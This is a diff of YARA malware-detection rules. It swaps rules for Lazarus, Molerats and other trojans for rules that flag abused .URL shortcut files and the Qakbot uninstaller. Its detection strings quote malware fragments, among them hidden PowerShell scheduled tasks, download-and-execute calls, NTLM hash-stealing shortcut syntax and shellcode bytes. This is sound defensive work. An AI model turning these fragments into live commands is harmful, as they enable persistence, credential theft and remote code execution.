+		author = "@itsreallynick (Nick Carr), @QW5kcmV3 (Andrew Thompson)"
+		id = "e23609a1-9b18-5a56-92ee-c7f84c966865"
+		date = "2019-09-27"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/8U6fY2"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_lazarus_dec17.yar#L12-L29"
+		reference = "https://twitter.com/cglyer/status/1176184798248919044"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_url_persitence.yar#L21-L39"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "50ff8418cf342147a81ef3a418e5e61d42f0e5764982e43b51d4dd3a983a548e"
-		score = 75
-		quality = 85
+		hash = "e0bef7497fcb284edb0c65b59d511830"
+		logic_hash = "4903c8f4bb08e799f6787ad29cf7688f354f97a065bcd24c58d3ccd3778a6a15"
+		score = 50
+		quality = 60
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "d5f9a81df5061c69be9c0ed55fba7d796e1a8ebab7c609ae437c574bd7b30b48"
 
 	strings:
-		$s1 = "::DataSpace/Storage/MSCompressed/Transform/" ascii
-		$s2 = "HHA Version 4." ascii
-		$s3 = { 74 45 58 74 53 6F 66 74 77 61 72 65 00 41 64 6F
-              62 65 20 49 6D 61 67 65 52 65 61 64 79 71 }
-		$s4 = "bUEeYE" fullword ascii
+		$file = /URL=file:\/\/[a-z0-9]/ nocase
+		$url_clsid = "[{000214A0-0000-0000-C000-000000000046}]"
+		$url_explicit = "[InternetShortcut]" nocase
 
 	condition:
-		uint16( 0 ) == 0x5449 and filesize < 4000KB and all of them
+		$file and any of ( $url* ) and uint16( 0 ) != 0x5A4D and uint32( 0 ) != 0x464c457f and uint32( 0 ) != 0xBEBAFECA and uint32( 0 ) != 0xFEEDFACE and uint32( 0 ) != 0xFEEDFACF and uint32( 0 ) != 0xCEFAEDFE and filesize < 30KB
 }
-rule SIGNATURE_BASE_Lazarus_Dec_17_2 : FILE
+rule SIGNATURE_BASE_Methodology_Suspicious_Shortcut_Iconremote_Smborlocal : FILE
 {
 	meta:
-		description = "Detects Lazarus malware from incident in Dec 2017"
-		author = "Florian Roth (Nextron Systems)"
-		id = "45127fb5-0f70-5140-acd9-46147d365dfe"
-		date = "2017-12-20"
+		description = "This is the syntax used for NTLM hash stealing via Responder - https://www.securify.nl/nl/blog/SFY20180501/living-off-the-land_-stealing-netntlm-hashes.html"
+		author = "@itsreallynick (Nick Carr)"
+		id = "9362ce46-265c-5215-bee1-3d784d0cb928"
+		date = "2019-09-27"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/8U6fY2"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_lazarus_dec17.yar#L31-L51"
+		reference = "https://twitter.com/ItsReallyNick/status/1176241449148588032"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_url_persitence.yar#L61-L78"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "273cd54a0c3ecf53893de0ef9c41d784725eea6cc843e04df01cd8f29d61a797"
-		score = 75
+		logic_hash = "8c49908c7f52ebcd512ff2dc8c40392767769130b9d39abb9d5fc9e130edb65c"
+		score = 50
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "cbebafb2f4d77967ffb1a74aac09633b5af616046f31dddf899019ba78a55411"
-		hash2 = "9ca3e56dcb2d1b92e88a0d09d8cab2207ee6d1f55bada744ef81e8b8cf155453"
 
 	strings:
-		$s1 = "SkypeSetup.exe" fullword wide
-		$s2 = "%s\\SkypeSetup.exe" fullword ascii
-		$s3 = "Skype Technologies S.A." fullword wide
-		$a1 = "Microsoft Code Signing PCA" ascii wide
+		$icon = "IconFile=file://" nocase
+		$url_clsid = "[{000214A0-0000-0000-C000-000000000046}]"
+		$url_explicit = "[InternetShortcut]" nocase
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 7000KB and ( all of ( $s* ) and not $a1 )
+		$icon and any of ( $url* ) and uint16( 0 ) != 0x5A4D and uint32( 0 ) != 0x464c457f and uint32( 0 ) != 0xBEBAFECA and uint32( 0 ) != 0xFEEDFACE and uint32( 0 ) != 0xFEEDFACF and uint32( 0 ) != 0xCEFAEDFE and filesize < 30KB
 }
-rule SIGNATURE_BASE_Lazarus_Dec_17_4 : FILE
+rule SIGNATURE_BASE_Methodology_Shortcut_Hotkey : FILE
 {
 	meta:
-		description = "Detects Lazarus malware from incident in Dec 2017ithumb.js"
-		author = "Florian Roth (Nextron Systems)"
-		id = "fbdc6287-c177-53b5-83dd-979936f65192"
-		date = "2017-12-20"
+		description = "Detects possible shortcut usage for .URL persistence"
+		author = "@itsreallynick (Nick Carr)"
+		id = "0ce377c4-db9b-59fa-987b-a77eaf408765"
+		date = "2019-09-27"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/8U6fY2"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_lazarus_dec17.yar#L53-L67"
+		reference = "https://twitter.com/cglyer/status/1176184798248919044"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_url_persitence.yar#L80-L97"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "70801347699d339cb47cad03ec3f694b09a976e32b70052a97fade09fcac679d"
-		score = 75
-		quality = 85
+		logic_hash = "a48f7c1125218ee89f58f1517e81150038a5d71889d847e7690b13c818b32fb5"
+		score = 50
+		quality = 60
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "8ff100ca86cb62117f1290e71d5f9c0519661d6c955d9fcfb71f0bbdf75b51b3"
-		hash2 = "7975c09dd436fededd38acee9769ad367bfe07c769770bd152f33a10ed36529e"
 
 	strings:
-		$s1 = "var _0xf5ed=[\"\\x57\\x53\\x63\\x72\\x69\\x70\\x74\\x2E\\x53\\x68\\x65\\x6C\\x6C\"," ascii
+		$hotkey = /[\x0a\x0d]HotKey=[1-9]/ nocase
+		$url_clsid = "[{000214A0-0000-0000-C000-000000000046}]"
+		$url_explicit = "[InternetShortcut]" nocase
 
 	condition:
-		filesize < 9KB and 1 of them
+		$hotkey and any of ( $url* ) and uint16( 0 ) != 0x5A4D and uint32( 0 ) != 0x464c457f and uint32( 0 ) != 0xBEBAFECA and uint32( 0 ) != 0xFEEDFACE and uint32( 0 ) != 0xFEEDFACF and uint32( 0 ) != 0xCEFAEDFE and filesize < 30KB
 }
-rule SIGNATURE_BASE_Lazarus_Dec_17_5 : FILE
+rule SIGNATURE_BASE_Methodology_Suspicious_Shortcut_Baseurlsyntax : FILE
 {
 	meta:
-		description = "Detects Lazarus malware from incident in Dec 2017"
-		author = "Florian Roth (Nextron Systems)"
-		id = "33bd8c08-123e-5a8e-b5dc-02af7291addc"
-		date = "2017-12-20"
+		description = "Detects possible shortcut usage for .URL persistence"
+		author = "@itsreallynick (Nick Carr)"
+		id = "cab7b573-d197-5afc-95a9-ef05a07c2b7a"
+		date = "2019-09-27"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/8U6fY2"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_lazarus_dec17.yar#L69-L89"
+		reference = "https://twitter.com/cglyer/status/1176184798248919044"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_url_persitence.yar#L99-L117"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "480ec19f7050d34713ed621ae9ec5d5463b1cc4710b473465cc78e533796d2e4"
-		score = 75
+		logic_hash = "4aa29bedb5689fe16c067f5ea933e56804085712c7469b138d8b658a30a7eb67"
+		score = 50
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "db8163d054a35522d0dec35743cfd2c9872e0eb446467b573a79f84d61761471"
 
 	strings:
-		$x1 = "$ProID = Start-Process powershell.exe -PassThru -WindowStyle Hidden -ArgumentList" fullword ascii
-		$x2 = "$respTxt = HttpRequestFunc_doprocess -szURI $szFullURL -szMethod $szMethod -contentData $contentData;" fullword ascii
-		$x3 = "[String]$PS_PATH = \"C:\\\\Users\\\\Public\\\\Documents\\\\ProxyAutoUpdate.ps1\";" fullword ascii
-		$x4 = "$cmdSchedule = 'schtasks /create /tn \"ProxyServerUpdater\"" ascii
-		$x5 = "/tr \"powershell.exe -ep bypass -windowstyle hidden -file " ascii
-		$x6 = "C:\\\\Users\\\\Public\\\\Documents\\\\tmp' + -join " ascii
-		$x7 = "$cmdResult = cmd.exe /c $cmdInst | Out-String;" fullword ascii
-		$x8 = "whoami /groups | findstr /c:\"S-1-5-32-544\"" fullword ascii
+		$baseurl1 = "BASEURL=file://" nocase
+		$baseurl2 = "[DEFAULT]" nocase
+		$url_clsid = "[{000214A0-0000-0000-C000-000000000046}]"
+		$url_explicit = "[InternetShortcut]" nocase
 
 	condition:
-		filesize < 500KB and 1 of them
+		all of ( $baseurl* ) and any of ( $url* ) and uint16( 0 ) != 0x5A4D and uint32( 0 ) != 0x464c457f and uint32( 0 ) != 0xBEBAFECA and uint32( 0 ) != 0xFEEDFACE and uint32( 0 ) != 0xFEEDFACF and uint32( 0 ) != 0xCEFAEDFE and filesize < 30KB
 }
-rule SIGNATURE_BASE_Molerats_Jul17_Sample_1 : FILE
+rule SIGNATURE_BASE_Methodology_Suspicious_Shortcut_Iconnotfromexeordllorico : FILE
 {
 	meta:
-		description = "Detects Molerats sample - July 2017"
-		author = "Florian Roth (Nextron Systems)"
-		id = "b5277255-3ced-5dc5-9490-c5829a0c248b"
-		date = "2017-07-07"
+		description = "Detects possible shortcut usage for .URL persistence"
+		author = "@itsreallynick (Nick Carr)"
+		id = "82d0483f-48ee-5d0c-ba7d-73d9e9455423"
+		date = "2019-09-27"
 		modified = "2023-12-05"
-		reference = "https://mymalwareparty.blogspot.de/2017/07/operation-desert-eagle.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_molerats_jul17.yar#L11-L25"
+		reference = "https://twitter.com/ItsReallyNick/status/1176229087196696577"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_url_persitence.yar#L161-L179"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "1b7f00dfb83f5da46663d94f238b55e375743edbdb01701a78922b87c72c518a"
-		score = 75
+		logic_hash = "957fe9f24d08033cf6e29d7e202e04bfb579577d3850a99e97da6b70924ae88e"
+		score = 50
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "ebf2423b9de131eab1c61ac395cbcfc2ac3b15bd9c83b96ae0a48619a4a38d0a"
 
 	strings:
-		$s1 = "ezExODA0Y2U0LTkzMGEtNGIwOS1iZjcwLTlmMWE5NWQwZDcwZH0sIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49M2U1NjM1MDY5M2Y3MzU1ZQ==,[z]{c00" wide
+		$icon = "IconFile="
+		$icon_negate = /[\x0a\x0d]IconFile=[^\x0d]*\.(dll|exe|ico)\x0d/ nocase
+		$url_clsid = "[{000214A0-0000-0000-C000-000000000046}]"
+		$url_explicit = "[InternetShortcut]" nocase
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 200KB and all of them )
+		any of ( $url* ) and $icon and not $icon_negate and uint16( 0 ) != 0x5A4D and uint32( 0 ) != 0x464c457f and uint32( 0 ) != 0xBEBAFECA and uint32( 0 ) != 0xFEEDFACE and uint32( 0 ) != 0xFEEDFACF and uint32( 0 ) != 0xCEFAEDFE and filesize < 30KB
 }
-rule SIGNATURE_BASE_Molerats_Jul17_Sample_2 : FILE
+rule SIGNATURE_BASE_Methodology_Suspicious_Shortcut_Evasion : FILE
 {
 	meta:
-		description = "Detects Molerats sample - July 2017"
-		author = "Florian Roth (Nextron Systems)"
-		id = "7ef02003-83d1-5ec7-952d-1e693375dd4b"
-		date = "2017-07-07"
+		description = "Non-standard .URLs and evasion"
+		author = "@itsreallynick (Nick Carr)"
+		id = "36df4252-2575-5efa-88ce-17e68a349306"
+		date = "2019-09-27"
 		modified = "2023-12-05"
-		reference = "https://mymalwareparty.blogspot.de/2017/07/operation-desert-eagle.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_molerats_jul17.yar#L27-L42"
+		reference = "https://twitter.com/DissectMalware/status/1176736510856634368"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_url_persitence.yar#L181-L198"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "35a517039474dcc5d503a48ca17e544166ee2ed44417ea5e7711093d3956f80c"
-		score = 75
+		logic_hash = "c4fafae6af3ed5cc2e83e30427107d1c42cc4bc86d5c6a60e26953a11847029f"
+		score = 50
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "7e122a882d625f4ccac019efb7bf1b1024b9e0919d205105e7e299fb1a20a326"
 
 	strings:
-		$s1 = "Folder.exe" fullword ascii
-		$s2 = "Notepad++.exe" fullword wide
-		$s3 = "RSJLRSJOMSJ" fullword ascii
+		$URI = /[\x0a\x0d](IconFile|(Base|)URL)[^\x0d=]+/ nocase
+		$filetype_clsid = "[{000214A0-0000-0000-C000-000000000046}]"
+		$filetype_explicit = "[InternetShortcut]" nocase
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 1000KB and all of them )
+		any of ( $filetype* ) and $URI and uint16( 0 ) != 0x5A4D and uint32( 0 ) != 0x464c457f and uint32( 0 ) != 0xBEBAFECA and uint32( 0 ) != 0xFEEDFACE and uint32( 0 ) != 0xFEEDFACF and uint32( 0 ) != 0xCEFAEDFE and filesize < 30KB
 }
-rule SIGNATURE_BASE_Molerats_Jul17_Sample_3 : FILE
+rule SIGNATURE_BASE_Methodology_Suspicious_Shortcut_Lolcommand : FILE
 {
 	meta:
-		description = "Detects Molerats sample - July 2017"
-		author = "Florian Roth (Nextron Systems)"
-		id = "e1a3323e-fe84-59e5-86d9-dca0c261e3c3"
-		date = "2017-07-07"
-		modified = "2023-12-05"
-		reference = "https://mymalwareparty.blogspot.de/2017/07/operation-desert-eagle.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_molerats_jul17.yar#L44-L59"
+		description = "Detects possible shortcut usage for .URL persistence"
+		author = "@itsreallynick (Nick Carr)"
+		id = "061e7919-17f1-5774-ad7d-fc964dc9a947"
+		date = "2019-09-27"
+		modified = "2021-02-14"
+		reference = "https://twitter.com/ItsReallyNick/status/1176601500069576704"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_url_persitence.yar#L201-L219"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "4829905ede523fd9ed2cdf610f8fce4c0a5d993885e1897d1782ca70e96fa9a2"
-		score = 75
+		logic_hash = "4ac9a555e61303a173443de2a189536c8ea0fc32ee73c589dd104275c7967c57"
+		score = 50
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "995eee4122802c2dc83bb619f8c53173a5a9c656ad8f43178223d78802445131"
-		hash2 = "fec657a19356753008b0f477083993aa5c36ebaf7276742cf84bfe614678746b"
 
 	strings:
-		$s1 = "ccleaner.exe" fullword wide
-		$s2 = "Folder.exe" fullword ascii
+		$file1 = /[\x0a\x0d](IconFile|(Base|)URL)\s*=[^\x0d]*(powershell|cmd|certutil|mshta|wscript|cscript|rundll32|wmic|regsvr32|msbuild)(\.exe|)[^\x0d]{2,50}\x0d/ nocase
+		$url_clsid = "[{000214A0-0000-0000-C000-000000000046}]"
+		$url_explicit = "[InternetShortcut]" nocase
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 600KB and all of them )
+		any of ( $url* ) and any of ( $file* ) and uint16( 0 ) != 0x5A4D and uint32( 0 ) != 0x464c457f and uint32( 0 ) != 0xBEBAFECA and uint32( 0 ) != 0xFEEDFACE and uint32( 0 ) != 0xFEEDFACF and uint32( 0 ) != 0xCEFAEDFE and filesize < 30KB
 }
-rule SIGNATURE_BASE_Molerats_Jul17_Sample_4 : FILE
+rule SIGNATURE_BASE_Methodology_Suspicious_Shortcut_Webdav : FILE
 {
 	meta:
-		description = "Detects Molerats sample - July 2017"
-		author = "Florian Roth (Nextron Systems)"
-		id = "cad0c6a2-d286-52fa-b9b8-793ab9ae048f"
-		date = "2017-07-07"
+		description = "Detects possible shortcut usage for .URL persistence"
+		author = "@itsreallynick (Nick Carr)"
+		id = "cd660b84-d7c6-52fc-9e1d-76450e5262b1"
+		date = "2019-09-27"
 		modified = "2023-12-05"
-		reference = "https://mymalwareparty.blogspot.de/2017/07/operation-desert-eagle.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_molerats_jul17.yar#L61-L76"
+		reference = "https://twitter.com/cglyer/status/1176243536754282497"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_url_persitence.yar#L222-L239"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "dec058ae52a860f4850d7b8024b96c5a9044fdcebadbc12b384f5a6dfae91634"
-		score = 75
+		logic_hash = "4fec084392140245eeb25bb512f3a4631ec6be08c197ec130a907fc118161197"
+		score = 50
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "512a14130a7a8b5c2548aa488055051ab7e725106ddf2c705f6eb4cfa5dc795c"
 
 	strings:
-		$x1 = "get-itemproperty -path 'HKCU:\\SOFTWARE\\Microsoft\\' -name 'KeyName')" wide
-		$x2 = "O.Run C & chrw(34) & \"[System.IO.File]::" wide
-		$x3 = "HKCU\\SOFTWARE\\Microsoft\\\\KeyName\"" fullword wide
+		$file1 = /[\x0a\x0d](IconFile|(Base|)URL)\s*=\s*\/\/[A-Za-z0-9]/
+		$url_clsid = "[{000214A0-0000-0000-C000-000000000046}]"
+		$url_explicit = "[InternetShortcut]" nocase
 
 	condition:
-		( filesize < 700KB and 1 of them )
+		any of ( $url* ) and any of ( $file* ) and uint16( 0 ) != 0x5A4D and uint32( 0 ) != 0x464c457f and uint32( 0 ) != 0xBEBAFECA and uint32( 0 ) != 0xFEEDFACE and uint32( 0 ) != 0xFEEDFACF and uint32( 0 ) != 0xCEFAEDFE and filesize < 30KB
 }
-rule SIGNATURE_BASE_Molerats_Jul17_Sample_5 : FILE
+rule SIGNATURE_BASE_Methodology_Suspicious_Shortcut_Scripturl : FILE
 {
 	meta:
-		description = "Detects Molerats sample - July 2017"
-		author = "Florian Roth (Nextron Systems)"
-		id = "c9dd4f4a-a980-5339-b238-9f53360b89ae"
-		date = "2017-07-07"
+		description = "Detects possible shortcut usage for .URL persistence"
+		author = "@itsreallynick (Nick Carr)"
+		id = "2f55f8a9-4e4b-5480-9042-da6bb66b2e06"
+		date = "2019-09-27"
 		modified = "2023-12-05"
-		reference = "https://mymalwareparty.blogspot.de/2017/07/operation-desert-eagle.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_molerats_jul17.yar#L78-L95"
+		reference = "https://twitter.com/cglyer/status/1176184798248919044"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_url_persitence.yar#L241-L259"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "eb2bb54fc1749d8422cdc8e084e1fa66981611128f56e7d7d678f177d37b7cdd"
-		score = 75
+		logic_hash = "ece0013dbc9836fa800f99a10ab46c1eb081e1c04fe45fe17be26ffac1d464e9"
+		score = 50
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "ebf2423b9de131eab1c61ac395cbcfc2ac3b15bd9c83b96ae0a48619a4a38d0a"
 
 	strings:
-		$x1 = "powershell.exe -nop -c \"iex" nocase ascii
-		$x2 = ".run('%windir%\\\\SysWOW64\\\\WindowsPowerShell\\\\" ascii
-		$a1 = "Net.WebClient).DownloadString" nocase ascii
-		$a2 = "gist.githubusercontent.com" nocase ascii
+		$file1 = /[\x0a\x0d](IconFile|(Base|)URL)\s*=[^\x0d]*script:/ nocase
+		$url_clsid = "[{000214A0-0000-0000-C000-000000000046}]"
+		$url_explicit = "[InternetShortcut]" nocase
 
 	condition:
-		filesize < 200KB and ( 1 of ( $x* ) or 2 of them )
+		any of ( $url* ) and any of ( $file* ) and uint16( 0 ) != 0x5A4D and uint32( 0 ) != 0x464c457f and uint32( 0 ) != 0xBEBAFECA and uint32( 0 ) != 0xFEEDFACE and uint32( 0 ) != 0xFEEDFACF and uint32( 0 ) != 0xCEFAEDFE and filesize < 30KB
 }
-rule SIGNATURE_BASE_Molerats_Jul17_Sample_Dropper : FILE
+rule SIGNATURE_BASE_Methodology_Suspicious_Shortcut_Workingdirremote_HTTP : FILE
 {
 	meta:
-		description = "Detects Molerats sample dropper SFX - July 2017"
-		author = "Florian Roth (Nextron Systems)"
-		id = "b4622373-b496-51de-abaa-caa665b558b3"
-		date = "2017-07-07"
+		description = "Detects possible shortcut usage for .URL persistence"
+		author = "@itsreallynick (Nick Carr)"
+		id = "68e54f8a-11e4-59e4-8498-59d88e70e438"
+		date = "2019-09-27"
 		modified = "2023-12-05"
-		reference = "https://mymalwareparty.blogspot.de/2017/07/operation-desert-eagle.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_molerats_jul17.yar#L97-L112"
+		reference = "https://twitter.com/cglyer/status/1176184798248919044"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_url_persitence.yar#L261-L278"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "b356d8dbca8f4d11dda976e7eb03c993d05af35d13113b8c85fb07531a0203dc"
-		score = 75
+		logic_hash = "c7c23c1253bf089519dec5f141f486425c6804640d9bffac9ce4c986ce25d323"
+		score = 50
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "ad0b3ac8c573d84c0862bf1c912dba951ec280d31fe5b84745ccd12164b0bcdb"
 
 	strings:
-		$s1 = "Please remove %s from %s folder. It is unsecure to run %s until it is done." fullword wide
-		$s2 = "sfxrar.exe" fullword ascii
-		$s3 = "attachment.hta" fullword ascii
+		$icon = "WorkingDirectory=http" nocase
+		$url_clsid = "[{000214A0-0000-0000-C000-000000000046}]"
+		$url_explicit = "[InternetShortcut]" nocase
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 1000KB and all of them )
+		$icon and any of ( $url* ) and uint16( 0 ) != 0x5A4D and uint32( 0 ) != 0x464c457f and uint32( 0 ) != 0xBEBAFECA and uint32( 0 ) != 0xFEEDFACE and uint32( 0 ) != 0xFEEDFACF and uint32( 0 ) != 0xCEFAEDFE and filesize < 30KB
 }
-rule SIGNATURE_BASE_URL_File_Local_EXE : FILE
+rule SIGNATURE_BASE_Methodology_Suspicious_Shortcut_Workingdirremote_SMB : FILE
 {
 	meta:
-		description = "Detects an .url file that points to a local executable"
-		author = "Florian Roth (Nextron Systems)"
-		id = "8b157e98-7b69-5649-b1d8-40bd6b685bf6"
-		date = "2017-10-04"
+		description = "Detects possible shortcut usage for .URL persistence"
+		author = "@itsreallynick (Nick Carr)"
+		id = "26e19fe3-c25c-53b0-9b41-c04803134bc2"
+		date = "2019-09-27"
 		modified = "2023-12-05"
-		reference = "https://twitter.com/malwareforme/status/915300883012870144"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_url_to_local_exe.yar#L1-L15"
+		reference = "https://twitter.com/cglyer/status/1176184798248919044"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_url_persitence.yar#L280-L297"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "b85b723142f52ade68f6eb8ba54bb7dffafce0df6d1ae8a7c08b3ce621ccadd4"
-		score = 60
-		quality = 60
+		logic_hash = "5d9caa64ac730d34a2dcfb3368f8302849275b6ee16fe31f20978d72382b0d73"
+		score = 50
+		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "[InternetShortcut]" ascii wide fullword
-		$s2 = /URL=file:\/\/\/C:\\[^\n]{1,50}\.exe/
+		$icon = "WorkingDirectory=file://" nocase
+		$url_clsid = "[{000214A0-0000-0000-C000-000000000046}]"
+		$url_explicit = "[InternetShortcut]" nocase
 
 	condition:
-		filesize < 400 and all of them
+		$icon and any of ( $url* ) and uint16( 0 ) != 0x5A4D and uint32( 0 ) != 0x464c457f and uint32( 0 ) != 0xBEBAFECA and uint32( 0 ) != 0xFEEDFACE and uint32( 0 ) != 0xFEEDFACF and uint32( 0 ) != 0xCEFAEDFE and filesize < 30KB
 }
-rule SIGNATURE_BASE_Gen_Trojan_Mikey : FILE
+rule SIGNATURE_BASE_SUSP_Qakbot_Uninstaller_Shellcode_Aug23
 {
 	meta:
-		description = "Trojan Mikey - file sample_mikey.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "ff875436-4fed-5f20-a0a5-bfd146d93499"
-		date = "2015-05-07"
+		description = "Detects Qakbot Uninstaller files used by the FBI and Dutch National Police in a disruption operation against the Qakbot in August 2023"
+		author = "Florian Roth"
+		id = "860796ab-689f-5c5f-bc40-3e2ef7fd1d5d"
+		date = "2023-08-30"
 		modified = "2023-12-05"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_mikey_trojan.yar#L2-L21"
+		reference = "https://www.justice.gov/usao-cdca/divisions/national-security-division/qakbot-resources"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_qakbot_uninstaller.yar#L2-L14"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "a8e6c3ca056b3ff2495d7728654b780735b3a4cb"
-		logic_hash = "5454953bba09d6fc866bcb23ef81a0b6763d8f82b8b606597548cbb5cf6053ed"
-		score = 70
+		logic_hash = "91d26c50bf29517aa68e709ca3b6f32f4ca390f4c2f48e48cd251bfdd5dbcc71"
+		score = 60
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = ""
 
 	strings:
-		$s0 = "nuR\\noisreVtnerruC\\swodniW\\tfosorciM\\ERAWTFOS" fullword ascii
-		$x1 = "User-Agent:Mozilla/4.0 (compatible; MSIE %d.0; Windows NT %d.1; SV1)" fullword ascii
-		$x2 = "User-Agent:Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.0; MyIE 3.01)" fullword ascii
-		$x3 = "%d*%u%s" fullword ascii
-		$x4 = "%s %s:%d" fullword ascii
-		$x5 = "Mnopqrst Vwxyabcde Ghijklm Opqrstuv Xya" fullword ascii
+		$xc1 = { E8 00 00 00 00 58 55 89 E5 89 C2 68 03 00 00 00 68 00 2C 00 00 05 20 0A 00 00 50 E8 05 00 00 00 83 C4 04 C9 C3 81 EC 08 01 00 00 53 55 56 57 6A 6B 58 6A 65 5B 6A 72 66 89 84 24 D4 00 00 00 33 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and $s0 and 2 of ( $x* )
+		$xc1
 }
-rule SIGNATURE_BASE_Crime_Win_Rat_Alienspy : FILE
+rule SIGNATURE_BASE_SUSP_Qakbot_Uninstaller_FBI_Aug23
 {
 	meta:
-		description = "Alien Spy Remote Access Trojan"
-		author = "General Dynamics Fidelis Cybersecurity Solutions - Threat Research Team"
-		id = "a79789cd-9b16-58f5-ab51-48bb900583d1"
-		date = "2015-04-04"
